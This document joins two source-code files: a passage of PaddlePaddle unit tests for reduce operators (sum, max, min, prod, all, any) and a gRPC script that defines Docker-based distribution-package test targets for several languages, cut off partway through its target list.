"""Remove Max with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_max"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [-1]}
self.outputs = {
'Out': self.inputs['X'].max(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
@skip_check_grad_ci(
reason="reduce_min is discontinuous non-derivable function,"
" its gradient check is not supported by unittest framework.")
class TestMinOp(OpTest):
"""Remove Min with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [2]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestMin6DOp(OpTest):
"""Remove Min with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {
'X': np.random.random((2, 4, 3, 5, 6, 10)).astype("float64")
}
self.attrs = {'dim': [2, 4]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestMin8DOp(OpTest):
"""Remove Min with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {
'X': np.random.random((2, 4, 3, 5, 6, 3, 2, 4)).astype("float64")
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestProdOp(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.init_data_type()
self.inputs = {'X': np.random.random((5, 6, 10)).astype(self.data_type)}
self.outputs = {'Out': self.inputs['X'].prod(axis=0)}
def init_data_type(self):
self.data_type = "float32" if core.is_compiled_with_rocm(
) else "float64"
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestProd6DOp(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.init_data_type()
self.inputs = {
'X': np.random.random((5, 6, 2, 3, 4, 2)).astype(self.data_type)
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
def init_data_type(self):
self.data_type = "float32" if core.is_compiled_with_rocm(
) else "float64"
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestProd8DOp(OpTest):
def setUp(self):
self.op_type = "reduce_prod"
self.init_data_type()
self.inputs = {
'X': np.random.random(
(2, 5, 3, 2, 2, 3, 4, 2)).astype(self.data_type)
}
self.attrs = {'dim': [2, 3, 4]}
self.outputs = {
'Out': self.inputs['X'].prod(axis=tuple(self.attrs['dim']))
}
def init_data_type(self):
self.data_type = "float32" if core.is_compiled_with_rocm(
) else "float64"
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestAllOp(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.outputs = {'Out': self.inputs['X'].all()}
self.attrs = {'reduce_all': True}
def test_check_output(self):
self.check_output()
class TestAll8DOp(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'reduce_all': True, 'dim': (2, 3, 4)}
self.outputs = {'Out': self.inputs['X'].all(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAllOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': (1, )}
self.outputs = {'Out': self.inputs['X'].all(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAll8DOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (1, 3, 4)}
self.outputs = {'Out': self.inputs['X'].all(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAllOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': [1], 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].all(axis=1), axis=1)
}
def test_check_output(self):
self.check_output()
class TestAll8DOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_all"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (5, ), 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].all(axis=self.attrs['dim']), axis=5)
}
def test_check_output(self):
self.check_output()
class TestAllOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of reduce_all_op must be Variable.
input1 = 12
self.assertRaises(TypeError, fluid.layers.reduce_all, input1)
# The input dtype of reduce_all_op must be bool.
input2 = fluid.layers.data(
name='input2', shape=[12, 10], dtype="int32")
self.assertRaises(TypeError, fluid.layers.reduce_all, input2)
class TestAnyOp(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.outputs = {'Out': self.inputs['X'].any()}
self.attrs = {'reduce_all': True}
def test_check_output(self):
self.check_output()
class TestAny8DOp(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'reduce_all': True, 'dim': (3, 5, 4)}
self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAnyOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': [1]}
self.outputs = {'Out': self.inputs['X'].any(axis=1)}
def test_check_output(self):
self.check_output()
class TestAny8DOpWithDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (3, 6)}
self.outputs = {'Out': self.inputs['X'].any(axis=self.attrs['dim'])}
def test_check_output(self):
self.check_output()
class TestAnyOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {'X': np.random.randint(0, 2, (5, 6, 10)).astype("bool")}
self.attrs = {'dim': (1, ), 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].any(axis=self.attrs['dim']), axis=1)
}
def test_check_output(self):
self.check_output()
class TestAny8DOpWithKeepDim(OpTest):
def setUp(self):
self.op_type = "reduce_any"
self.inputs = {
'X': np.random.randint(0, 2,
(2, 5, 3, 2, 2, 3, 4, 2)).astype("bool")
}
self.attrs = {'dim': (1, ), 'keep_dim': True}
self.outputs = {
'Out': np.expand_dims(
self.inputs['X'].any(axis=self.attrs['dim']), axis=1)
}
def test_check_output(self):
self.check_output()
class TestAnyOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of reduce_any_op must be Variable.
input1 = 12
self.assertRaises(TypeError, fluid.layers.reduce_any, input1)
# The input dtype of reduce_any_op must be bool.
input2 = fluid.layers.data(
name='input2', shape=[12, 10], dtype="int32")
self.assertRaises(TypeError, fluid.layers.reduce_any, input2)
class Test1DReduce(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random(120).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class Test2DReduce0(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [0]}
self.inputs = {'X': np.random.random((20, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
class Test2DReduce1(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [1]}
self.inputs = {'X': np.random.random((20, 10)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce0(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [1]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce1(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [2]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce2(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [-2]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test3DReduce3(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': [1, 2]}
self.inputs = {'X': np.random.random((5, 6, 7)).astype("float64")}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class Test8DReduce0(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.attrs = {'dim': (4, 2, 3)}
self.inputs = {
'X': np.random.random((2, 5, 3, 2, 2, 3, 4, 2)).astype("float64")
}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']))
}
class TestKeepDimReduce(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [1], 'keep_dim': True}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=self.attrs['keep_dim'])
}
class TestKeepDim8DReduce(Test1DReduce):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {
'X': np.random.random((2, 5, 3, 2, 2, 3, 4, 2)).astype("float64")
}
self.attrs = {'dim': (3, 4, 5), 'keep_dim': True}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=self.attrs['keep_dim'])
}
@skip_check_grad_ci(
reason="reduce_max is discontinuous non-derivable function,"
" its gradient check is not supported by unittest framework.")
class TestReduceMaxOpMultiAxises(OpTest):
"""Remove Max with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_max"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [-2, -1]}
self.outputs = {
'Out': self.inputs['X'].max(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
@skip_check_grad_ci(
reason="reduce_min is discontinuous non-derivable function,"
" its gradient check is not supported by unittest framework.")
class TestReduceMinOpMultiAxises(OpTest):
"""Remove Min with subgradient from gradient check to confirm the success of CI."""
def setUp(self):
self.op_type = "reduce_min"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [1, 2]}
self.outputs = {
'Out': self.inputs['X'].min(axis=tuple(self.attrs['dim']))
}
def test_check_output(self):
self.check_output()
class TestKeepDimReduceSumMultiAxises(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((5, 6, 10)).astype("float64")}
self.attrs = {'dim': [-2, -1], 'keep_dim': True}
self.outputs = {
'Out':
self.inputs['X'].sum(axis=tuple(self.attrs['dim']), keepdims=True)
}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceSumWithDimOne(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((100, 1, 1)).astype("float64")}
self.attrs = {'dim': [1, 2], 'keep_dim': True}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=True)
}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceSumWithNumelOne(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((100, 1)).astype("float64")}
self.attrs = {'dim': [1], 'keep_dim': False}
self.outputs = {
'Out': self.inputs['X'].sum(axis=tuple(self.attrs['dim']),
keepdims=False)
}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceAll(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((100, 1, 1)).astype("float64")}
self.attrs = {'reduce_all': True, 'keep_dim': False}
self.outputs = {'Out': self.inputs['X'].sum()}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class Test1DReduceWithAxes1(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random(100).astype("float64")}
self.attrs = {'dim': [0], 'keep_dim': False}
self.outputs = {'Out': self.inputs['X'].sum(axis=0)}
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceWithDtype(OpTest):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((6, 2, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum().astype('float64')}
self.attrs = {'reduce_all': True}
self.attrs.update({
'in_dtype': int(convert_np_dtype_to_dtype_(np.float32)),
'out_dtype': int(convert_np_dtype_to_dtype_(np.float64))
})
def test_check_output(self):
self.check_output()
def test_check_grad(self):
self.check_grad(['X'], 'Out')
class TestReduceWithDtype1(TestReduceWithDtype):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((6, 2, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=1)}
self.attrs = {'dim': [1]}
self.attrs.update({
'in_dtype': int(convert_np_dtype_to_dtype_(np.float32)),
'out_dtype': int(convert_np_dtype_to_dtype_(np.float64))
})
class TestReduceWithDtype2(TestReduceWithDtype):
def setUp(self):
self.op_type = "reduce_sum"
self.inputs = {'X': np.random.random((6, 2, 10)).astype("float64")}
self.outputs = {'Out': self.inputs['X'].sum(axis=1, keepdims=True)}
self.attrs = {'dim': [1], 'keep_dim': True}
self.attrs.update({
'in_dtype': int(convert_np_dtype_to_dtype_(np.float32)),
'out_dtype': int(convert_np_dtype_to_dtype_(np.float64))
})
class TestReduceSumOpError(unittest.TestCase):
def test_errors(self):
with program_guard(Program(), Program()):
# The input type of reduce_sum_op must be Variable.
x1 = fluid.create_lod_tensor(
np.array([[-1]]), [[1]], fluid.CPUPlace())
self.assertRaises(TypeError, fluid.layers.reduce_sum, x1)
# The input dtype of reduce_sum_op must be float32 or float64 or int32 or int64.
x2 = fluid.layers.data(name='x2', shape=[4], dtype="uint8")
self.assertRaises(TypeError, fluid.layers.reduce_sum, x2)
class API_TestSumOp(unittest.TestCase):
def run_static(self,
shape,
x_dtype,
attr_axis,
attr_dtype=None,
np_axis=None):
if np_axis is None:
np_axis = attr_axis
with fluid.program_guard(fluid.Program(), fluid.Program()):
data = fluid.data("data", shape=shape, dtype=x_dtype)
result_sum = paddle.sum(x=data, axis=attr_axis, dtype=attr_dtype)
exe = fluid.Executor(fluid.CPUPlace())
input_data = np.random.rand(*shape).astype(x_dtype)
res, = exe.run(feed={"data": input_data}, fetch_list=[result_sum])
self.assertTrue(
np.allclose(
res, np.sum(input_data.astype(attr_dtype), axis=np_axis)))
def test_static(self):
shape = [10, 10]
axis = 1
self.run_static(shape, "bool", axis, attr_dtype=None)
self.run_static(shape, "bool", axis, attr_dtype="int32")
self.run_static(shape, "bool", axis, attr_dtype="int64")
self.run_static(shape, "int32", axis, attr_dtype=None)
self.run_static(shape, "int32", axis, attr_dtype="int32")
self.run_static(shape, "int32", axis, attr_dtype="int64")
self.run_static(shape, "int64", axis, attr_dtype=None)
self.run_static(shape, "int64", axis, attr_dtype="int64")
self.run_static(shape, "int64", axis, attr_dtype="int32")
self.run_static(shape, "float32", axis, attr_dtype=None)
self.run_static(shape, "float32", axis, attr_dtype="float32")
self.run_static(shape, "float32", axis, attr_dtype="float64")
self.run_static(shape, "float64", axis, attr_dtype=None)
self.run_static(shape, "float64", axis, attr_dtype="float32")
self.run_static(shape, "float64", axis, attr_dtype="float64")
shape = [5, 5, 5]
self.run_static(shape, "int32", (0, 1), attr_dtype="int32")
self.run_static(
shape, "int32", (), attr_dtype="int32", np_axis=(0, 1, 2))
def test_dygraph(self):
np_x = np.random.random([2, 3, 4]).astype('int32')
with fluid.dygraph.guard():
x = fluid.dygraph.to_variable(np_x)
out0 = paddle.sum(x).numpy()
out1 = paddle.sum(x, axis=0).numpy()
out2 = paddle.sum(x, axis=(0, 1)).numpy()
out3 = paddle.sum(x, axis=(0, 1, 2)).numpy()
self.assertTrue((out0 == np.sum(np_x, axis=(0, 1, 2))).all())
self.assertTrue((out1 == np.sum(np_x, axis=0)).all())
self.assertTrue((out2 == np.sum(np_x, axis=(0, 1))).all())
self.assertTrue((out3 == np.sum(np_x, axis=(0, 1, 2))).all())
class TestAllAPI(unittest.TestCase):
def setUp(self):
np.random.seed(123)
paddle.enable_static()
self.places = [fluid.CPUPlace()]
if core.is_compiled_with_cuda():
self.places.append(fluid.CUDAPlace(0))
def check_static_result(self, place):
with fluid.program_guard(fluid.Program(), fluid.Program()):
input = fluid.data(name="input", shape=[4, 4], dtype="bool")
result = paddle.all(x=input)
input_np = np.random.randint(0, 2, [4, 4]).astype("bool")
exe = fluid.Executor(place)
fetches = exe.run(fluid.default_main_program(),
feed={"input": input_np},
fetch_list=[result])
self.assertTrue(np.allclose(fetches[0], np.all(input_np)))
def test_static(self):
for place in self.places:
self.check_static_result(place=place)
def test_dygraph(self):
paddle.disable_static()
for place in self.places:
with fluid.dygraph.guard(place):
np_x = np.random.randint(0, 2, (12, 10)).astype(np.bool)
x = fluid.layers.assign(np_x)
x = fluid.layers.cast(x, 'bool')
out1 = paddle.all(x)
np_out1 = out1.numpy()
expect_res1 = np.all(np_x)
self.assertTrue((np_out1 == expect_res1).all())
out2 = paddle.all(x, axis=0)
np_out2 = out2.numpy()
expect_res2 = np.all(np_x, axis=0)
self.assertTrue((np_out2 == expect_res2).all())
out3 = paddle.all(x, axis=-1)
np_out3 = out3.numpy()
expect_res3 = np.all(np_x, axis=-1)
self.assertTrue((np_out3 == expect_res3).all())
out4 = paddle.all(x, axis=1, keepdim=True)
np_out4 = out4.numpy()
expect_res4 = np.all(np_x, axis=1, keepdims=True)
self.assertTrue((np_out4 == expect_res4).all())
paddle.enable_static()
class TestAnyAPI(unittest.TestCase):
def setUp(self):
np.random.seed(123)
paddle.enable_static()
self.places = [fluid.CPUPlace()]
if core.is_compiled_with_cuda():
self.places.append(fluid.CUDAPlace(0))
def check_static_result(self, place):
with fluid.program_guard(fluid.Program(), fluid.Program()):
input = fluid.data(name="input", shape=[4, 4], dtype="bool")
result = paddle.any(x=input)
input_np = np.random.randint(0, 2, [4, 4]).astype("bool")
exe = fluid.Executor(place)
fetches = exe.run(fluid.default_main_program(),
feed={"input": input_np},
fetch_list=[result])
self.assertTrue(np.allclose(fetches[0], np.any(input_np)))
def test_static(self):
for place in self.places:
self.check_static_result(place=place)
def test_dygraph(self):
paddle.disable_static()
for place in self.places:
with fluid.dygraph.guard(place):
np_x = np.random.randint(0, 2, (12, 10)).astype(np.bool)
x = fluid.layers.assign(np_x)
x = fluid.layers.cast(x, 'bool')
out1 = paddle.any(x)
np_out1 = out1.numpy()
expect_res1 = np.any(np_x)
self.assertTrue((np_out1 == expect_res1).all())
out2 = paddle.any(x, axis=0)
np_out2 = out2.numpy()
expect_res2 = np.any(np_x, axis=0)
self.assertTrue((np_out2 == expect_res2).all())
out3 = paddle.any(x, axis=-1)
np_out3 = out3.numpy()
expect_res3 = np.any(np_x, axis=-1)
self.assertTrue((np_out3 == expect_res3).all())
out4 = paddle.any(x, axis=1, keepdim=True)
np_out4 = out4.numpy()
expect_res4 = np.any(np_x, axis=1, keepdims=True)
self.assertTrue((np_out4 == expect_res4).all())
paddle.enable_static()
if __name__ == '__main__':
import paddle
paddle.enable_static()
unittest.main()
|
|
#!/usr/bin/env python
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definition of targets run distribution package tests."""
import os.path
import sys
sys.path.insert(0, os.path.abspath('..'))
import python_utils.jobset as jobset
def create_docker_jobspec(name,
dockerfile_dir,
shell_command,
environ={},
flake_retries=0,
timeout_retries=0,
copy_rel_path=None,
timeout_seconds=30 * 60):
"""Creates jobspec for a task running under docker."""
environ = environ.copy()
environ['RUN_COMMAND'] = shell_command
# the entire repo will be cloned if copy_rel_path is not set.
if copy_rel_path:
environ['RELATIVE_COPY_PATH'] = copy_rel_path
docker_args = []
for k, v in list(environ.items()):
docker_args += ['-e', '%s=%s' % (k, v)]
docker_env = {
'DOCKERFILE_DIR': dockerfile_dir,
'DOCKER_RUN_SCRIPT': 'tools/run_tests/dockerize/docker_run.sh'
}
jobspec = jobset.JobSpec(
cmdline=['tools/run_tests/dockerize/build_and_run_docker.sh'] +
docker_args,
environ=docker_env,
shortname='distribtest.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries)
return jobspec
def create_jobspec(name,
cmdline,
environ=None,
shell=False,
flake_retries=0,
timeout_retries=0,
use_workspace=False,
timeout_seconds=10 * 60):
"""Creates jobspec."""
environ = environ.copy()
if use_workspace:
environ['WORKSPACE_NAME'] = 'workspace_%s' % name
cmdline = ['bash', 'tools/run_tests/artifacts/run_in_workspace.sh'
] + cmdline
jobspec = jobset.JobSpec(cmdline=cmdline,
environ=environ,
shortname='distribtest.%s' % (name),
timeout_seconds=timeout_seconds,
flake_retries=flake_retries,
timeout_retries=timeout_retries,
shell=shell)
return jobspec
class CSharpDistribTest(object):
"""Tests C# NuGet package"""
def __init__(self,
platform,
arch,
docker_suffix=None,
use_dotnet_cli=False,
presubmit=False):
self.name = 'csharp_%s_%s' % (platform, arch)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.labels = ['distribtest', 'csharp', platform, arch]
if presubmit:
self.labels.append('presubmit')
self.script_suffix = ''
if docker_suffix:
self.name += '_%s' % docker_suffix
self.labels.append(docker_suffix)
if use_dotnet_cli:
self.name += '_dotnetcli'
self.script_suffix = '_dotnetcli'
self.labels.append('dotnetcli')
else:
self.labels.append('olddotnet')
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
del inner_jobs # arg unused as there is little opportunity for parallelizing whats inside the distribtests
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/csharp_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/csharp/run_distrib_test%s.sh' %
self.script_suffix,
copy_rel_path='test/distrib')
elif self.platform == 'macos':
return create_jobspec(self.name, [
'test/distrib/csharp/run_distrib_test%s.sh' % self.script_suffix
],
environ={'EXTERNAL_GIT_ROOT': '../../../..'},
use_workspace=True)
elif self.platform == 'windows':
if self.arch == 'x64':
# Use double leading / as the first occurrence gets removed by msys bash
# when invoking the .bat file (side-effect of posix path conversion)
environ = {
'MSBUILD_EXTRA_ARGS': '//p:Platform=x64',
'DISTRIBTEST_OUTPATH': 'DistribTest\\bin\\x64\\Debug'
}
else:
environ = {'DISTRIBTEST_OUTPATH': 'DistribTest\\bin\\Debug'}
return create_jobspec(self.name, [
'test\\distrib\\csharp\\run_distrib_test%s.bat' %
self.script_suffix
],
environ=environ,
use_workspace=True)
else:
raise Exception("Not supported yet.")
def __str__(self):
return self.name
class PythonDistribTest(object):
"""Tests Python package"""
def __init__(self,
platform,
arch,
docker_suffix,
source=False,
presubmit=False):
self.source = source
if source:
self.name = 'python_dev_%s_%s_%s' % (platform, arch, docker_suffix)
else:
self.name = 'python_%s_%s_%s' % (platform, arch, docker_suffix)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.labels = ['distribtest', 'python', platform, arch, docker_suffix]
if presubmit:
self.labels.append('presubmit')
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
# TODO(jtattermusch): honor inner_jobs arg for this task.
del inner_jobs
if not self.platform == 'linux':
raise Exception("Not supported yet.")
if self.source:
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/python_dev_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/python/run_source_distrib_test.sh',
copy_rel_path='test/distrib')
else:
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/python_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/python/run_binary_distrib_test.sh',
copy_rel_path='test/distrib')
def __str__(self):
return self.name
class RubyDistribTest(object):
"""Tests Ruby package"""
def __init__(self,
platform,
arch,
docker_suffix,
ruby_version=None,
source=False,
presubmit=False):
self.package_type = 'binary'
if source:
self.package_type = 'source'
self.name = 'ruby_%s_%s_%s_version_%s_package_type_%s' % (
platform, arch, docker_suffix, ruby_version or
'unspecified', self.package_type)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.ruby_version = ruby_version
self.labels = ['distribtest', 'ruby', platform, arch, docker_suffix]
if presubmit:
self.labels.append('presubmit')
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
# TODO(jtattermusch): honor inner_jobs arg for this task.
del inner_jobs
arch_to_gem_arch = {
'x64': 'x86_64',
'x86': 'x86',
}
if not self.platform == 'linux':
raise Exception("Not supported yet.")
dockerfile_name = 'tools/dockerfile/distribtest/ruby_%s_%s' % (
self.docker_suffix, self.arch)
if self.ruby_version is not None:
dockerfile_name += '_%s' % self.ruby_version
return create_docker_jobspec(
self.name,
dockerfile_name,
'test/distrib/ruby/run_distrib_test.sh %s %s %s' %
(arch_to_gem_arch[self.arch], self.platform, self.package_type),
copy_rel_path='test/distrib')
def __str__(self):
return self.name
class PHP7DistribTest(object):
"""Tests PHP7 package"""
def __init__(self, platform, arch, docker_suffix=None, presubmit=False):
self.name = 'php7_%s_%s_%s' % (platform, arch, docker_suffix)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.labels = ['distribtest', 'php', 'php7', platform, arch]
if presubmit:
self.labels.append('presubmit')
if docker_suffix:
self.labels.append(docker_suffix)
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
# TODO(jtattermusch): honor inner_jobs arg for this task.
del inner_jobs
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/php7_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/php/run_distrib_test.sh',
copy_rel_path='test/distrib')
elif self.platform == 'macos':
return create_jobspec(
self.name, ['test/distrib/php/run_distrib_test_macos.sh'],
environ={'EXTERNAL_GIT_ROOT': '../../../..'},
timeout_seconds=15 * 60,
use_workspace=True)
else:
raise Exception("Not supported yet.")
def __str__(self):
return self.name
class CppDistribTest(object):
"""Tests Cpp make install by building examples."""
def __init__(self,
platform,
arch,
docker_suffix=None,
testcase=None,
presubmit=False):
if platform == 'linux':
self.name = 'cpp_%s_%s_%s_%s' % (platform, arch, docker_suffix,
testcase)
else:
self.name = 'cpp_%s_%s_%s' % (platform, arch, testcase)
self.platform = platform
self.arch = arch
self.docker_suffix = docker_suffix
self.testcase = testcase
self.labels = [
'distribtest',
'cpp',
platform,
arch,
testcase,
]
if presubmit:
self.labels.append('presubmit')
if docker_suffix:
self.labels.append(docker_suffix)
def pre_build_jobspecs(self):
return []
def build_jobspec(self, inner_jobs=None):
environ = {}
if inner_jobs is not None:
# set number of parallel jobs for the C++ build
environ['GRPC_CPP_DISTRIBTEST_BUILD_COMPILER_JOBS'] = str(
inner_jobs)
if self.platform == 'linux':
return create_docker_jobspec(
self.name,
'tools/dockerfile/distribtest/cpp_%s_%s' %
(self.docker_suffix, self.arch),
'test/distrib/cpp/run_distrib_test_%s.sh' % self.testcase,
timeout_seconds=45 * 60)
elif self.platform == 'windows':
return create_jobspec(
self.name,
['test\\distrib\\cpp\\run_distrib_test_%s.bat' % self.testcase],
environ={},
timeout_seconds=30 * 60,
use_workspace=True)
else:
raise Exception("Not supported yet.")
def __str__(self):
return self.name
def targets():
"""Gets list of supported targets"""
return [
# C++
CppDistribTest('linux',
'x64',
'jessie',
'cmake_as_submodule',
presubmit=True),
CppDistribTest('linux', 'x64', 'stretch', 'cmake', presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_as_externalproject',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_fetchcontent',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_module_install',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_module_install_pkgconfig',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch',
'cmake_pkgconfig',
presubmit=True),
CppDistribTest('linux',
'x64',
'stretch_aarch64_cross',
'cmake_aarch64_cross',
presubmit=True),
CppDistribTest('windows', 'x86', testcase='cmake', presubmit=True),
CppDistribTest('windows',
'x86',
